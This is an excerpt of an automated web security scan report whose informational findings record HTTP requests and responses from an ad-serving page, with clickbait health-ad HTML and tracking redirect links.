<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...

19.65. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:21:08 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.66. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:31:24 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11">Shocking Joint Discovery</a></span>
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.67. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:26:15 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11">How to Relieve Joints?</a></span>
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11">Shocking Joint Discovery</a></span>
